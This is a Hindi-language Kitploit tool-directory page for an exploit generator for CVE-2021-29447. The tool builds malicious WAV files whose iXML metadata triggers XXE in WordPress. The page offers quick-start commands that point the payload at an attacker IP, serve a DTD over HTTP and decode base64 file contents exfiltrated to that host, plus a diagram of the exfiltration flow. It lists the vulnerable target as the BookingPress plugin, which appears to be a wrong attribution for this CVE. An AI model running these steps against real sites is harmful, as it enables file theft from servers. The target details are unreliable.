Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447 — एक XXE पेलोड जनरेटर | Kitploit
उपकरण/GitHubGitHub/0xricksanchez/cve-2021-29447
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनवेब सुरक्षा
GitHub0xricksanchez/cve-2021-29447

CVE-2021-29447

एक XXE पेलोड जनरेटर

रिपॉजिटरी देखें
410 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WAV iXML XXE एक्सप्लॉइट जनरेटर

दुर्भावनापूर्ण WAV फ़ाइलें उत्पन्न करता है जो iXML मेटाडेटा चंक्स को पार्स करने वाले WordPress प्लगइन्स में XXE कमजोरियों का शोषण करती हैं (जैसे, BookingPress < 1.0.11)।

त्वरित आरंभ

root@kitploit:~
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d

कार्यप्रवाह

root@kitploit:~
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │

संवेदनशील लक्ष्य

  • WordPress BookingPress प्लगइन < 1.0.11
  • कोई भी एप्लिकेशन जो बाहरी एंटिटी को अक्षम किए बिना WAV फ़ाइलों में iXML चंक्स को पार्स करता है

संदर्भ

  • WPScan कमजोरी डेटाबेस
  • CVE: CVE-2021-29447
टूल डाउनलोड करें